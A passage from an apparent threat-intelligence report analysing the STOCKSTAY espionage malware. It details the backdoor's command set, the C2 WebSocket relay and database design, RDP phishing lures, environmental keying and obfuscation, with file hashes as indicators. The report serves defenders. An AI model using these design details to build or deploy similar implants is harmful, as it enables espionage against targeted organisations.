<p><span>On first execution, STOCKSTAY.STOCKMARKET generates a unique 4096-bit RSA key pair, to be used throughout the implant’s lifecycle to encrypt outbound data prior to being sent via WebSocket. The implant’s public key is sent to the server in the malware’s first request, to enable the server to decrypt task responses. STOCKSTAY.STOCKMARKET also generates a unique infection identifier to be used by the C2 server to determine the intended receiver of tasking. STOCKSTAY’s configuration file specifies an </span><span>“</span><code>internal_id</code><span>” field, which GTIG assesses represents an identifier for the server-side component of the malware ecosystem. We assess that this identifier is used by the malware’s operators to retrieve responses from interim C2 servers which may be used by multiple operators. To date, GTIG has observed only a single unique value for this identifier and is unable to determine whether multiple operators are leveraging STOCKSTAY at this time due to insufficient telemetry.</span></p>
<h4><span>STOCKSTAY.STOCKTRADER</span></h4>
<p><span>STOCKSTAY.STOCKTRADER, internally referred to as “</span><code>sys</code><span>”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host, as detailed in Table 1.</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><span>Task Command Name</span></p>
</th>
<th scope="col">
<p><span>Description</span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>Del</code></p>
</td>
<td>
<p><span>Delete the specified files.</span></p>
<p><span>Requires a semi-colon-separated list of file paths, each of which will be deleted. Confirmation of each deleted file, or deletion failure, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Dir</code></p>
</td>
<td>
<p><span>Generate a listing of the specified directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be enumerated with the paths of all contained files and subdirectories being returned to the C2.</span></p>
<p><span>Optionally performs recursive directory listing.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Get</code></p>
</td>
<td>
<p><span>Retrieve one or more specified files. Allows for collection of files with specific extensions.</span></p>
<p><span>Requires a semi-colon-separated list of file or directory paths, and a list of target file extensions. If a file path is included in the list, this file will be returned. If instead a directory path is included in the list, the malware will perform an optionally recursive search of the directory to identify any files matching the target file extensions. </span></p>
<p><span>All files matching either the specified file paths, or the target file extensions, will be added to an in-memory ZIP archive and subsequently base64-encoded for transmission to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Image</code></p>
</td>
<td>
<p><span>Perform a screen-capture of the victim’s screen.</span></p>
<p><span>The resultant image is base64-encoded for transmission to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>MkDir</code></p>
</td>
<td>
<p><span>Create one or more directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be created. Confirmation of each created directory, or any resultant error, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>MultyTask</code></p>
</td>
<td>
<p><span>Process multiple tasks at once.</span></p>
<p><span>Requires a semi-colon-separated list of tasks, each of which must be a serialized JSON object containing an individual task.</span></p>
<p><span>Each task is submitted to the malware’s command-manager in-turn, with all command output being discarded; no data is returned to the C2 when processing multiple tasks at once.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Put</code></p>
</td>
<td>
<p><span>Upload a file to the device.</span></p>
<p><span>Requires a base64-encoded string representation of the file content to be written to the specified filepath. The required file write operation is performed in “Append” mode.</span></p>
<p><span>Confirmation of file upload, or details of any relevant error, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegDelete</code></p>
</td>
<td>
<p><span>Delete a registry value.</span></p>
<p><span>Requires a registry key and corresponding value name to delete.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegRead</code></p>
</td>
<td>
<p><span>Read a registry value.</span></p>
<p><span>Requires a registry key and corresponding value name to read.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegWrite</code></p>
</td>
<td>
<p><span>Set a registry value. </span></p>
<p><span>Requires a registry key and corresponding value name, as well as the value and data type used to populate the registry value. </span></p>
</td>
</tr>
<tr>
<td>
<p><code>RmDir</code></p>
</td>
<td>
<p><span>Delete the specified directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be deleted. Confirmation of each deleted directory, or deletion failure, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Run</code></p>
</td>
<td>
<p><span>Execute a new process.</span></p>
<p><span>Requires a path to the file to execute and its corresponding arguments. A default timeout of 60 seconds is hard-coded into the malware, however this can be overridden by the task configuration.</span></p>
<p><span>All subprocesses are created windowless with redirected stdout.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Sysinfo</code></p>
</td>
<td>
<p><span>Conduct a system survey to gather key information about the infected host.</span></p>
<p><span>Operating system information is collected via the Windows Management Instrumentation (WMI) ManagementObjectSearcher, specifically the following fields:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>OSVersion</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Architecture</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SerialNumber</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CodeSet</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CountryCode</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Locale</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>InstallDate</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>BootupTime</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MachineName</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SystemDirectory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>LocalTime</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>AnsiCodePage</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>UserName</span></p>
</li>
</ul>
<p><span>With respect to hardware, WMI is queried for the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>ProcessorName</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>NumberCores</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>ClockSpeed</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MemoryCapacity</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MemoryType</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DiskModel </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DiskSize</span></p>
</li>
</ul>
<p><span>The malware also captures a list of the names of running processes.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>UnpackArchive</code></p>
</td>
<td>
<p><span>Extract the specified ZIP file to its current directory.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 1: Backdoor commands supported by STOCKSTAY.STOCKTRADER</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Related Downloaders and Installers</span></h4>
<h5><span>STOCKSTAY.MARKETMAKER</span></h5>
<p><span>STOCKSTAY.MARKETMAKER is a proxy-aware downloader written in .NET using the Windows Forms framework that downloads and extracts additional payloads from a remote server, establishes persistence through Windows registry modifications, and runs silently in the background with no user interface. This downloader has been observed masquerading as "MicrosoftUpdateOneDrive" to appear legitimate while setting up multiple autorun entries to execute the core components of STOCKSTAY.</span></p>
<h5><span>.NET AppDomainManager</span></h5>
<p><span>During our analysis, GTIG identified what we believe to be an early development sample of STOCKSTAY.MARKETMAKER which, instead of downloading the required components, was dependent on external mechanisms (such as </span><a href="https://attack.mitre.org/techniques/T1574/014/" rel="noopener" target="_blank"><span>.NET AppDomainManager injection</span></a><span>) for the initial deployment of samples to the target host.</span></p>
<h4><span>STOCKSTAY Server-Side Controller</span></h4>
<p><span>GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as </span><a href="https://render.com/" rel="noopener" target="_blank"><span>Render</span></a><span> platform which provides a platform for hosting web services, including </span><a href="https://render.com/docs/websocket" rel="noopener" target="_blank"><span>WebSockets</span></a><span>. The inability for the server to decrypt inbound messages prevents introspection by platform operators, and further obfuscates the location of the threat actor’s dedicated infrastructure. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig4.max-1000x1000.png" alt="Overview of STOCKSTAY C2 Infrastructure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="s9mt0">Figure 4: Overview of STOCKSTAY C2 Infrastructure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The server extends </span><code>tornado.websocket.WebSocketHandler</code><span> to provide the interface described in Table 2, under the path </span><code>/ws</code><span>; aligning with all observed STOCKSTAY WebSocket C2 URLs.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Event</span></strong></p>
</td>
<td>
<p><strong><span>Description</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin" rel="noopener" target="_blank"><span>WebSocketHandler.check_origin</span></a></p>
</td>
<td>
<p><span>Hard-coded to return True to </span><span>accept all cross-origin traffic.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.open" rel="noopener" target="_blank"><span>WebSocketHandler.open</span></a></p>
</td>
<td>
<p><span>Logs the client’s IP address using the following string format:</span></p>
<p><code>WebSocket open. IP: {client_ip}</code></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_message" rel="noopener" target="_blank"><span>WebSocketHandler.on_message</span></a></p>
</td>
<td>
<p><span>Handles inbound messages from the connected client.</span></p>
<p><span>Inbound messages are base64-decoded before being parsed as JSON into an object internally known as a “package”.</span></p>
<p><span>Each “package” contains an “action” and a “container”, which provide the request’s type and associated data, respectively. The following describes the handling logic of each action type.</span></p>
<p><strong>Action: </strong><strong>send</strong></p>
<p><span>The server extracts the following attributes from the inbound message’s “container” and inserts them into a new row within the local </span><code>weather_data</code><span> database table.</span></p>
<p><code>container.target</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The STOCKSTAY client populates this field with the </span><code>internal_id</code><span> or </span><code>i_id</code><span> field from the config file.</span></p>
</li>
</ul>
<p><code>container.sender</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The STOCKSTAY client populates this field with the unique client uuid generated on first execution.</span></p>
</li>
</ul>
<p><code>container.message</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>This field contains the encrypted message body in a format referred to within the STOCKSTAY client as “CryptoContainer”. </span></p>
</li>
</ul>
<p><span>On completion, the server logs the following message:</span></p>
<p><code>Action: send; trgt={target_id}; sndr={sender_id}</code></p>
<p><strong>Action: </strong><strong>recv</strong></p>
<p><span>Inbound </span><code>recv</code><span> requests simply specify the </span><code>container.sender</code><span> attribute, which corresponds with the client’s unique identifier.</span></p>
<p><span>The server then retrieves all messages from the </span><code>weather_data</code><span> database table where the target identifier (“degrees” column) matches the specified </span><code>container.sender</code><span>. This has the effect of allowing the client to retrieve all messages intended for it, such as those sent to the server by an upstream C2 controller.</span></p>
<p><span>Each matching row is returned to the client in the following format, before being deleted from the database.<br><br></span></p>
<pre class="language-plain"><code>{
	"target": degrees,
	"sender": pressure,
	"message": wdata,
	"ip": coords,
	"time": datetime
}</code></pre>
<p><span>On completion, the server logs the following message:</span></p>
<p><code>Action: recv; sndr={sender}</code></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_close" rel="noopener" target="_blank"><span>WebSocketHandler.on_close</span></a></p>
</td>
<td>
<p><span>Logs the client’s IP address using the following string format:</span></p>
<p><code>WebSocket close. IP: {client_ip}</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 2: Overview of STOCKSTAY WebSocket Server Interface</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Database Structure</span></h4>
<p><span>The server maintains a local SQLite3 database under the filename </span><code>weather_data1.db</code><span>, structured as shown in Tables 3 and 4.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Column</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>id</code></p>
</td>
<td>
<p><span>Primary key</span></p>
</td>
</tr>
<tr>
<td>
<p><code>degrees</code></p>
</td>
<td>
<p><span>Recipient's UUID from </span><code>container.target</code></p>
</td>
</tr>
<tr>
<td>
<p><code>pressure</code></p>
</td>
<td>
<p><span>Sender's UUID from </span><code>container.sender</code></p>
</td>
</tr>
<tr>
<td>
<p><code>wdata</code></p>
</td>
<td>
<p><span>Message data from </span><code>container.message</code></p>
</td>
</tr>
<tr>
<td>
<p><code>coords</code></p>
</td>
<td>
<p><span>Sender's IP address, extracted from </span><code>X-Forwarded-For</code><span> header, or </span><code>none_ip</code><span> if no sender specified.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>status</code></p>
</td>
<td>
<p><span>Defaults to 0 - doesn't appear to be used or returned to the client.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>datetime</code></p>
</td>
<td>
<p><span>Time of row creation</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 3: </span><code>weather_data</code><span> database table structure</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Column</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>id</code></p>
</td>
<td>
<p><span>Primary key</span></p>
</td>
</tr>
<tr>
<td>
<p><code>data</code></p>
</td>
<td>
<p><span>Log message</span></p>
</td>
</tr>
<tr>
<td>
<p><code>datetime</code></p>
</td>
<td>
<p><span>Time of creation</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 4: </span><code>log</code><span> database table structure</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Key Operational Characteristics</span></h3>
<h4><span>Consistent Use of Academic or Diplomatic Lure Content</span></h4>
<p><span>The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>compromising an email account belonging to a Ukrainian university to disseminate phishing emails;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using the names of an academic institution within the file name of a malicious RDP file;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>compromising a diplomatic education platform for phishing and distribution of malicious RDP files;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using “education” and “diplo” within registered phishing domains; and</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using “DiplomacyEduAI” as the product name within STOCKSTAY MSI files.</span></p>
</li>
</ul>
<h4><span>Persistent Ukrainian Targeting</span></h4>
<p><span>A significant proportion of STOCKSTAY operations observed by GTIG have been targeted at Government or Military organizations within Ukraine, consistent with Russian interests in relation to the ongoing conflict between the two countries. The threat actor has been observed utilizing in-country compromised infrastructure, including compromised government services, to deploy both STOCKSTAY and a range of supplementary payloads, in support of these operations. </span></p>
<h4><span>Suspected European Targeting</span></h4>
<p><span>A smaller number of STOCKSTAY operations observed by GTIG appear to have been targeted at European entities. Early development samples of STOCKSTAY were identified in various European nations, including Italy, the Netherlands, Poland, and Germany; however, we have been largely unable to confirm the intended victims for the majority of these early infections, nor whether these samples were identified as a result of the threat actor testing their capabilities against publicly available virus scanning services such as VirusTotal. GTIG was able to identify, in at least one case, the targeting of entities associated with, or interested in, a foreign affairs ministry in Europe in relation to phishing and suspected STOCKSTAY activity. </span></p>
<h4><span>Deployment via Malicious RDP Files</span></h4>
<p><span>GTIG observed STOCKSTAY being deployed following successful phishing attempts using malicious RDP configuration files. The RDP files were designed to create a connection from the victim’s device to actor-controlled infrastructure, through which the actor could then deploy subsequent payloads.</span></p>
<p><span>In one operation in early 2025, GTIG identified a phishing email, claiming to be sent by a defense-related training academy, containing a malicious RDP file attachment. A short time following the victim’s connection to the actor’s infrastructure, the actor deployed STOCKSTAY.MARKETMAKER, a .NET downloader designed to retrieve and install the full STOCKSTAY suite on the victim’s device. </span></p>
<p><span>Later, in mid-2025, GTIG identified similar malicious RDP files being hosted on a compromised diplomatic-themed education platform, luring victims into downloading and executing the file under the guise of enabling access to an online training portal. GTIG was unable to confirm whether STOCKSTAY was ultimately deployed as a result of this operation; however, overlaps in the actor’s infrastructure and education-themed lures for both operations may suggest STOCKSTAY was the intended payload. </span></p>
<h4><span>Deployments at Multiple Stages of Operations</span></h4>
<p><span>Through GTIG’s visibility, we have identified that the threat actor uses STOCKSTAY at multiple distinct stages of their operations. </span></p>
<p><span>In the first instance, the threat actor uses STOCKSTAY during operations to gain initial access into environments which haven’t yet been subject to the group’s reconnaissance activities. In these instances, STOCKSTAY is configured with hard-coded configuration passwords, which can be trivially extracted by analysts. We observed this type of infection stemming from the group’s phishing operations, where the threat actor is unable to determine exactly where in the victim’s network they are going to gain their initial foothold.</span></p>
<p><span>When the threat actor deploys STOCKSTAY at a later stage of operation, following reconnaissance, STOCKSTAY is configured to incorporate environmental keying for its configuration, requiring the malware to be executed either on a specific host, by a specific user, within a specific domain, or a pre-determined combination of the these attributes. This configuration implies that, at this stage, the actor knows exactly which machine is being targeted, likely through existing accesses to the target environment. This was seen within Ukrainian networks where STOCKSTAY was deployed toward the end of an operation which had previously relied heavily on the group’s other tools, such as KAZUAR. </span></p>
<h3><span>Overlaps with KAZUAR</span></h3>
<h4><span>K1MORPHER String Obfuscation</span></h4>
<p><span>In April 2025, GTIG observed STOCKSTAY being updated to implement a new string obfuscation mechanism, based around an obscure pseudo-random number generation algorithm named “Squirrel3”, which was </span><a href="https://www.gdcvault.com/play/1024365/Math-for-Game-Programmers-Noise" rel="noopener" target="_blank"><span>presented</span></a><span> at Game Developers Conference 2017. </span></p>
<p><span>GTIG later identified versions of STOCKSTAY containing some of their original class-names, which showed the code responsible for runtime string deobfuscation being contained within a class named “K1.Morpher”. Analysis of K1MORPHER shows the ability to perform runtime deobfuscation of a range of datatypes, such as strings, integers, and arrays. </span></p>
<p><span>In June 2025 GTIG noticed K1MORPHER code appearing in samples of KAZUAR. KAZUAR has historically used its own simple but effective code and string obfuscation techniques to evade detection, such as: the insertion of junk code; replacing static constant values with the results of XOR operations; and large quantities of unique character substitution tables. The actor’s use of K1MORPHER within STOCKSTAY appears to be trending toward mimicking KAZUAR’s multi-class obfuscation techniques, where obfuscation is handled by multiple distinct classes, as observed in suspected test builds of STOCKSTAY hosted on a compromised Cypriot website in April 2024.</span></p>
<h4><span>Implant Architecture</span><span> </span></h4>
<p><span>Since at least 2024, KAZUAR has been observed being deployed using a multi-component architecture, whereby C2 communication, task orchestration, and task execution are managed by separate components. Within the KAZUAR ecosystem, these components are referred to as “BRIDGE”, “KERNEL”, and “WORKER”, respectively.</span></p>
<p><span>As of late 2023, GTIG identified a similar separation of responsibilities within the STOCKSTAY ecosystem, with the same responsibilities being separated into distinct components. C2 communication is managed by the component tracked by GTIG as STOCKSTAY.STOCKBROKER, while task orchestration and execution are handled by STOCKSTAY.STOCKMARKET and STOCKSTAY.STOCKTRADER, respectively.</span></p>
<h4><span>Environmental Keying</span></h4>
<p><span>Both KAZUAR and STOCKSTAY ecosystems have been observed using environmental keying to protect themselves from detection and analysis.</span></p>
<p><span>DIAMONDBACK, a dropper often deployed prior to KAZUAR in the execution chain, has made use of a hash of the target’s hostname in decrypting its payload, to prevent divulgence of its intentions outside of the target environment. Later versions of DIAMONDBACK can be configured to incorporate the target’s username and domain name in the hash required to decrypt the payload.</span></p>
<p><span>STOCKSTAY has been observed using the hash of the target’s hostname or domain name during the decryption of its configuration data, preventing disclosure of C2 infrastructure unless operating in the intended environment.</span></p>
<h4><span>Summary of Overlaps</span></h4>
<p><span>GTIG assesses with moderate confidence that STOCKSTAY and KAZUAR may be developed in-part by a common developer or team, with active development occurring in tandem between the two malware ecosystems. We believe that STOCKSTAY is being developed in KAZUAR’s image, with several design decisions likely spawning from the threat actor’s wealth of experience in conducting operations using this long-standing toolkit. Both ecosystems rely heavily on .NET development, and have been observed using compromised WordPress sites during various stages of their operations.</span></p>
<p><span>We assess with low confidence that our observations of STOCKSTAY being deployed alongside KAZUAR during active operations may be a result of the threat actor seeking to test new capabilities in active operations, particularly where they may be expecting their existing access to be remediated in the near future. </span></p>
<h3><span>STOCKSTAY Timeline</span></h3>
<p><span>GTIG has conducted a thorough investigation into the history of STOCKSTAY, identifying suspected development activity as far back as December 2022. What follows is our assessment of the timeline of events surrounding STOCKSTAY’s development and deployment. To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) within each observed operation section, and in a </span><a href="https://www.virustotal.com/gui/collection/ed88a43801b5c58b9be27fa74abaa278a48904f3cc1bc905f2d85e32448b96c5/iocs" rel="noopener" target="_blank"><span>GTI Collection</span></a><span> for registered users.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig5.max-1000x1000.png" alt="Timeline of STOCKSTAY observations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="qw6cr">Figure 5: Timeline of STOCKSTAY observations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>December 2022</span></h4>
<p><span>The version of the open-source websocket-sharp.dll bundled with the majority of observed STOCKSTAY.STOCKBROKER samples was last modified, according to timestamp information in MSI files and ZIP archives containing STOCKSTAY. Although built from an open-source library, this specific instance appears to have been compiled by the actor themselves, thus creating a uniquely identifiable artifact with which to track this malware’s continuous development.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>websocket-sharp.dll</code></p>
</td>
<td>
<p><span>Instance of open-source library used by the threat actor</span></p>
</td>
<td>
<p><code>d1e54270433a94aa3d45d888e4c62299bee3480eb2cb4a5489c7dda69d476c3e</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 5: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>September 21, 2023: Germany</span></h4>
<p><span>An early version of STOCKSTAY was uploaded to VirusTotal from Germany, under the filename “DriversPrinterGraphic.rar”. From the archive’s timestamps, it appears as though the sample was submitted within 20 minutes of being created, likely indicating this was submitted by the malware’s developer.</span></p>
<p><span>This version predates the malware’s separation into distinct role-based components, instead incorporating all core functionality into a single executable: StockMarketNews.exe. Additionally, this version of STOCKSTAY contained the user interface shown in Figure 6, which enables viewing/editing of configuration options and command messages, while still presenting as a stock market utility.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig6.max-1000x1000.png" alt="Early STOCKSTAY user-interface">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="qw6cr">Figure 6: Early STOCKSTAY user-interface</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>This particular STOCKSTAY sample uses a slightly different configuration file format; however, the underlying configuration options are consistent with later versions. This sample also utilizes environmental keying for its configuration file; using the lower-cased hostname of the intended target as the decryption password. GTIG has been unable to recover the password at this time.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>DriversPrinterGraphic.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY</span></p>
</td>
<td>
<p><code>e6d8192960a89d5480868b94088cccdaa1560f9c8a0b0282ced2b7c1f72341b6</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNews.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY combined executable</span></p>
</td>
<td>
<p><code>1fc23ec18a94a599a34c74ef5f49a1e27acd37a07d5846661702b5e7e81a6a24</code></p>
</td>
</tr>
<tr>
<td>
<p><code>sample.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 6: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>December 5 – 6, 2023: Netherlands</span></h4>
<p><span>A further RAR archive containing STOCKSTAY was submitted to VirusTotal at 2023-12-06 08:52:49 from the Netherlands, under the filename “apps_libwallets_v1.3.rar”. This archive was last modified the previous day at 2023-12-05 16:47:42. This pattern may indicate that the archive was created by the individual at the end of their working day, and then submitted the following day when they returned to the office.</span></p>
<p><span>This instance of STOCKSTAY was the first case observed by GTIG of the malware’s core functionality being separated into distinct role-based components, using the filenames shown in Table 7.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Component</strong></p>
</td>
<td>
<p><strong>Filename</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><span>StockMarketView.exe</span></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><span>StockMarketNet.exe</span></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><span>StockMarketSystem.exe</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 7: STOCKSTAY component filenames observed in December 2023</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><p><span>Similar to the sample observed in September 2023, this instance of STOCKSTAY also used environmental keying, however this instance used the target computer’s domain name as the configuration password. GTIG has been unable to recover the password at this time.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
